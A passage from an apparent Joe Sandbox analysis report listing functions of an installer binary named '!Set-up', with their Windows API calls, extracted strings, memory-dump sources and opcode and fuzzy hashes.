                                                              • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                              Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                              • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                              • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                              • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                              • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                              • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                              • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                              • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                              • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406902
                                                              • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                              • String ID: F$A
                                                              • API String ID: 3347642858-1281894373
                                                              • Opcode ID: 9d23a5a8c0223ae690e18e5715e7d3cdc314298ad832e99d2ae59d35dee8c45f
                                                              • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                              • Opcode Fuzzy Hash: 9d23a5a8c0223ae690e18e5715e7d3cdc314298ad832e99d2ae59d35dee8c45f
                                                              • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                              Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                              • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                              • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                              • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                              • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                              • CloseHandle.KERNEL32(?), ref: 00407212
                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                              • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                              • API String ID: 1916479912-1189179171
                                                              • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                              • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                              • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                              • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                              Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                              Strings
                                                              • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: CreateInstance
                                                              • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                              • API String ID: 542301482-1377821865
                                                              • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                              • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                              • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                              • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                              Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                              • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                              • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                              • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                              Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                              • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                              • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                              • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                              Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                              • lstrlenW.KERNEL32(?), ref: 004063F8
                                                              • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                              • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                              • GlobalFree.KERNEL32(?), ref: 00406509
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                              • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                              • API String ID: 20674999-2124804629
                                                              • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                              • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                              • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                              • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                              Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                              • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                              • GetSysColor.USER32(?), ref: 004041DB
                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                              • lstrlenW.KERNEL32(?), ref: 00404202
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                              • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                              • SendMessageW.USER32(00000000), ref: 0040427D
                                                              • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                              • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                              • SetCursor.USER32(00000000), ref: 004042FE
                                                              • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                              • SetCursor.USER32(00000000), ref: 00404322
                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                              • String ID: F$N$open
                                                              • API String ID: 3928313111-1104729357
                                                              • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                              • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                              • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                              • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                              Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                              • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                              • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                              • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                              • wsprintfA.USER32 ref: 00406B79
                                                              • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                              • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                              • CloseHandle.KERNEL32(?), ref: 00406C88
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                              • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                              • API String ID: 565278875-3368763019
                                                              • Opcode ID: c66772e8c78fc620be6d4cc5b43e883a49b8d8bdc18a99bb2091202eebcb1dd4
                                                              • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                              • Opcode Fuzzy Hash: c66772e8c78fc620be6d4cc5b43e883a49b8d8bdc18a99bb2091202eebcb1dd4
                                                              • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              APIs
